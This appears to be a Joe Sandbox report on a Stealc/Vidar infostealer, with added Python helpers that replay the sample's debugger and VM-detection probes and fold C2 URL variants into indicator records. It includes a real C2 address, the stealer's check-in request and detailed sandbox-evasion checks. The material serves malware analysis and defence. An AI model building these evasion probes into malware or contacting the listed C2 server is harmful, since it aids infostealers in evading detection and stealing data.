                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13690)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13693)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13745)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13705)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13711)
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002E45C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F9750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
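The window class names and titles, the \\.\NTICE, \\.\SICE and \\.\SIWVID device opens (SoftICE driver names) and the DriverDesc / SystemBiosVersion / VideoBiosVersion registry reads from the previous section, together with the VBOX, VMware and Hyper-V strings found in memory, are the set of probes an analysis image has to survive before the sample runs its payload; the Oreans.vxd and Software\WinLicense strings above identify them as the protector's own checks rather than the stealer's. The script below is an added example, not from the report or the sample: on a Windows host it performs the same probes live (FindWindowA, CreateFileA on the device names, winreg) so an analysis VM can be tested, and elsewhere it evaluates a constructed profile. The VIRTUALBOX marker is an assumption added for the display adapter name; both profiles are constructed, not measured on the machine behind this report.

```python
"""Replays the anti-analysis probes from the report against a host profile.

Added example; not part of the Joe Sandbox report and not code from the sample.
"""
import sys

WINDOW_CLASSES = ["regmonclass", "gbdyllo", "procmon_window_class", "ollydbg", "filemonclass"]
WINDOW_TITLES = [
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
]
SOFTICE_DEVICES = ["NTICE", "SICE", "SIWVID"]          # opened as \\.\NTICE and so on
REGISTRY_VALUES = [                                    # (HKLM subkey, value name)
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000", "DriverDesc"),
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
]
REGISTRY_KEYS = [r"HARDWARE\ACPI\DSDT\VBOX__"]         # existence alone is the tell
# VBOX, VMWARE and HYPER-V come from the sample's memory; VIRTUALBOX is an
# assumption added because the adapter's DriverDesc on a VirtualBox guest reads
# "VirtualBox Graphics Adapter".
VM_MARKERS = ["VBOX", "VMWARE", "HYPER-V", "VIRTUALBOX"]


def evaluate(profile: dict) -> list:
    """Return one line per probe that would succeed on this host."""
    hits = []
    visible = {w.lower() for w in profile.get("windows", ())}
    for name in WINDOW_CLASSES + WINDOW_TITLES:
        if name in visible:
            hits.append(f"window present: {name}")
    for dev in SOFTICE_DEVICES:
        if dev in profile.get("devices", ()):
            hits.append(f"device opens: \\\\.\\{dev}")
    for key, value in REGISTRY_VALUES:
        data = str(profile.get("registry", {}).get((key, value), "")).upper()
        for marker in VM_MARKERS:
            if marker in data:
                hits.append(f"registry {key}\\{value} contains {marker}")
    for key in REGISTRY_KEYS:
        if key in profile.get("registry_keys", ()):
            hits.append(f"registry key exists: {key}")
    return hits


def collect_windows_profile() -> dict:
    """Live collection; only meaningful on a Windows host, ideally the analysis VM."""
    import ctypes
    import winreg
    user32, k32 = ctypes.windll.user32, ctypes.windll.kernel32
    user32.FindWindowA.restype = ctypes.c_void_p
    k32.CreateFileA.restype = ctypes.c_void_p
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    invalid = (None, 0xFFFFFFFF, 0xFFFFFFFFFFFFFFFF)    # NULL / INVALID_HANDLE_VALUE
    profile = {"windows": set(), "devices": set(), "registry": {}, "registry_keys": set()}
    for cls in WINDOW_CLASSES:
        if user32.FindWindowA(cls.encode(), None):
            profile["windows"].add(cls)
    for title in WINDOW_TITLES:
        if user32.FindWindowA(None, title.encode()):
            profile["windows"].add(title)
    for dev in SOFTICE_DEVICES:
        h = k32.CreateFileA(b"\\\\.\\" + dev.encode(), 0, 0, None, 3, 0, None)  # 3 = OPEN_EXISTING
        if h not in invalid:
            profile["devices"].add(dev)
            k32.CloseHandle(h)
    for key, value in REGISTRY_VALUES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
                profile["registry"][(key, value)] = winreg.QueryValueEx(k, value)[0]
        except OSError:
            pass
    for key in REGISTRY_KEYS:
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key))
            profile["registry_keys"].add(key)
        except OSError:
            pass
    return profile


# Constructed profiles for offline use: an un-hardened VirtualBox guest with
# Process Monitor open, and a guest whose firmware and adapter strings were rewritten.
STOCK_VBOX_WITH_PROCMON = {
    "windows": {"procmon_window_class", "Process Monitor - Sysinternals: www.sysinternals.com"},
    "devices": set(),
    "registry": {
        REGISTRY_VALUES[0]: "VirtualBox Graphics Adapter",
        REGISTRY_VALUES[1]: ["VBOX   - 1"],                  # REG_MULTI_SZ comes back as a list
        REGISTRY_VALUES[2]: ["Oracle VM VirtualBox VBE Adapter"],
    },
    "registry_keys": {r"HARDWARE\ACPI\DSDT\VBOX__"},
}
HARDENED_GUEST = {
    "windows": set(),
    "devices": set(),
    "registry": {
        REGISTRY_VALUES[0]: "Intel(R) UHD Graphics 630",
        REGISTRY_VALUES[1]: ["DELL   - 1072009"],
        REGISTRY_VALUES[2]: ["Intel Video BIOS"],
    },
    "registry_keys": set(),
}


def report(profile=None) -> list:
    if profile is None:
        profile = collect_windows_profile() if sys.platform == "win32" else STOCK_VBOX_WITH_PROCMON
    return evaluate(profile)


if __name__ == "__main__":
    for line in report() or ["no probe would succeed"]:
        print(line)
```

Closing Process Monitor before detonation is the cheap half; the registry and ACPI markers need to be rewritten in the image itself, and the RDTSC probes earlier in this section are not covered by any of this and have to be handled by the hypervisor or by patching.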

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.2061630664.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.2061630664.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix. Only techniques with at least one matching signature are listed; the number in parentheses is the count of matching signatures.

                Execution: Command and Scripting Interpreter (2); Native API (11)
                Persistence: DLL Side-Loading (1)
                Privilege Escalation: Process Injection (11); DLL Side-Loading (1)
                Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
                Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
                Collection: Archive Collected Data (1)
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12)
                Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no matching technique
                Source | Detection | Scanner | Label
                file.exe | 53% | Virustotal |
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/x | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.php= | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpr | 17% | Virustotal |
                http://185.215.113.37/D | 17% | Virustotal |
                http://185.215.113.37/v | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpe | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpU | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpS | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpX | 17% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.php= | file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/D | file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpr | file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/x | file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpU | file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpe | file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/v | file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpS | file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpX | file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
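The ten strings above all derive from the two URLs that carry a reputation verdict: string carving from process memory picks up one trailing byte of whatever followed the URL in the dump, which is how ".php=", ".phpU" and "/D" arise. Publishing them as ten separate indicators dilutes a feed. The helper below is an added example, not part of the report: it folds such variants back onto the canonical URLs, keeps anything that is not a near-duplicate separate so a genuinely new URL is never merged away, and emits flat IOC records. The raw strings are those from the table above; the one-byte slack and the record layout are choices of this example.

```python
"""Folds carved memory-string URL variants onto known C2 URLs and emits IOCs.

Added example; not part of the Joe Sandbox report.
"""
from collections import Counter
from urllib.parse import urlsplit

# The two URLs with a "URL Reputation: malware" verdict in the report.
CANONICAL = [
    "http://185.215.113.37/",
    "http://185.215.113.37/e2b1563c6670f193.php",
]

# The raw strings from the memory-strings table, verbatim.
RAW_MEMORY_URLS = [
    "http://185.215.113.37/e2b1563c6670f193.php=",
    "http://185.215.113.37/D",
    "http://185.215.113.37/e2b1563c6670f193.phpr",
    "http://185.215.113.37",
    "http://185.215.113.37/x",
    "http://185.215.113.37/e2b1563c6670f193.phpU",
    "http://185.215.113.37/e2b1563c6670f193.phpe",
    "http://185.215.113.37/v",
    "http://185.215.113.37/e2b1563c6670f193.phpS",
    "http://185.215.113.37/e2b1563c6670f193.phpX",
]


def canonicalise(raw: str, known=CANONICAL, slack: int = 1):
    """Return the known URL that `raw` is a near-duplicate of, else None.

    The longest known URL is tried first so ".../e2b...php=" folds onto the
    gate and not onto the bare host. A bare host without its trailing slash is
    treated as the host URL. `slack` is the number of trailing bytes tolerated;
    1 fits carved strings, anything larger starts swallowing real paths.
    """
    s = raw.strip()
    for url in sorted(known, key=len, reverse=True):
        if s == url or s == url.rstrip("/"):
            return url
        if s.startswith(url) and 0 < len(s) - len(url) <= slack:
            return url
    return None


def fold(raw_urls, known=CANONICAL, slack: int = 1):
    """Split raw strings into ({canonical: variant count}, [leftovers])."""
    counts, leftovers = Counter(), []
    for raw in raw_urls:
        hit = canonicalise(raw, known, slack)
        if hit is None:
            leftovers.append(raw)
        else:
            counts[hit] += 1
    return dict(counts), leftovers


def iocs(raw_urls, known=CANONICAL):
    """Flat IOC records: url, host, and how many memory variants support it."""
    counts, leftovers = fold(raw_urls, known)
    records = [{"type": "url", "value": url, "host": urlsplit(url).hostname,
                "memory_variants": counts.get(url, 0)} for url in known]
    records += [{"type": "url-unverified", "value": u, "host": urlsplit(u).hostname,
                 "memory_variants": 1} for u in leftovers]
    return records


if __name__ == "__main__":
    for record in iocs(RAW_MEMORY_URLS):
        print(record)
```

The folded count is itself useful evidence: six memory variants of the .php gate and four of the bare host is what repeated HTTP requests to one endpoint look like, consistent with the reputation verdicts above rather than with an incidental string.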
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1532868
                Start date and time: 2024-10-14 03:57:07 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 3m 7s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 2
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: file.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 92
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                No simulations
                Match: 185.215.113.37
                Associated Sample Name / URL | Detection | Threat Name | Context
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                No context
                Match: WHOLESALECONNECTIONSNL
                Associated Sample Name / URL | Detection | Threat Name | Context
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc, Vidar | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc, Vidar | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc, Vidar | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc, Vidar | 185.215.113.37
                No context
                No context
                No created / dropped files found
                File type: PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit): 7.947988679118368
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name: file.exe
                File size: 1'838'592 bytes
                MD5: 2e51f94d1dc93d7faaf5da2708fed2de
                SHA1: 3e9f21e5c0154ea1eb6ad2829ec86bfdd8ef178c
                SHA256: cc6b3fcb986b487a1e9fdb5d0a0fc23ff1ea90cbc55733439c83898eb189773f
                SHA512: d65a4258c9578444fdb91a0cab3fae265e9e5eb0e0fa6dbf7344e4dc47f10536b0689e1406b4e52ae7bb39f71d8f205fa5257d1d7f64a10c6076473d24985c0a
                SSDEEP: 49152:F3RkDDb9IiLFnZq/7DLx5mhkUsKa9Q3lr:4HFCXx9U1am3h
                TLSH: 2A85335CFECD7DB8F70D773A803D5AA95E206793039C31E984820679625318A9FF0A67
                File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash: 00928e8e8686b000
                Entrypoint: 0xa97000
                Entrypoint Section: .taggant
                Digitally signed: false
                Imagebase: 0x400000
                Subsystem: windows gui
                Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major: 5
                OS Version Minor: 1
                File Version Major: 5
                File Version Minor: 1
                Subsystem Version Major: 5
                Subsystem Version Minor: 1
                Import Hash: 2eabe9054cad5152567f0699947a2c5b
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                 | 0x1000 | 0x25b000 | 0x22800 | 19fb598d8c0b44d706761440c327a7f2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                 | 0x25e000 | 0x29d000 | 0x200 | 1947f1efdd5e8b3934ebb10148463d9a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                eyyunreg | 0x4fb000 | 0x19b000 | 0x19ac00 | 5800e116ecc9e0aa3b886b6d473bb0ef | False | 0.9950084163877054 | data | 7.954155944105544 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                cayhnmlo | 0x696000 | 0x1000 | 0x400 | 633cb3f174521b23208a1645ee71c5ca | False | 0.7919921875 | data | 6.173438865718246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x697000 | 0x3000 | 0x2200 | e2101cef3a168c9144935d02aa23789c | False | 0.060546875 | DOS executable (COM) | 0.7242961351499368 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-10-14T03:58:03.786676+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 14, 2024 03:58:02.844085932 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 14, 2024 03:58:02.849061966 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 14, 2024 03:58:02.849351883 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 14, 2024 03:58:02.849592924 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 14, 2024 03:58:02.854419947 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 14, 2024 03:58:03.555542946 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 14, 2024 03:58:03.555866957 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 14, 2024 03:58:03.559432983 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 14, 2024 03:58:03.564323902 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 14, 2024 03:58:03.786614895 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 14, 2024 03:58:03.786675930 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 14, 2024 03:58:06.722495079 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                • 185.215.113.37
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 6756 | C:\Users\user\Desktop\file.exe
                Timestamp | Bytes transferred | Direction | Data
                Oct 14, 2024 03:58:02.849592924 CEST | 89 | OUT | GET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 14, 2024 03:58:03.555542946 CEST | 203 | IN | HTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 01:58:03 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 14, 2024 03:58:03.559432983 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 34 37 33 46 39 33 44 46 30 30 33 32 38 33 38 39 36 32 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a
                Data Ascii:
                ------GIEHJDHCBAEHJJJKKFID
                Content-Disposition: form-data; name="hwid"

                E1473F93DF003283896264
                ------GIEHJDHCBAEHJJJKKFID
                Content-Disposition: form-data; name="build"

                doma
                ------GIEHJDHCBAEHJJJKKFID--
                Oct 14, 2024 03:58:03.786614895 CEST | 210 | IN | HTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 01:58:03 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=

                Target ID:0
                Start time:21:57:59
                Start date:13/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x2e0000
                File size:1'838'592 bytes
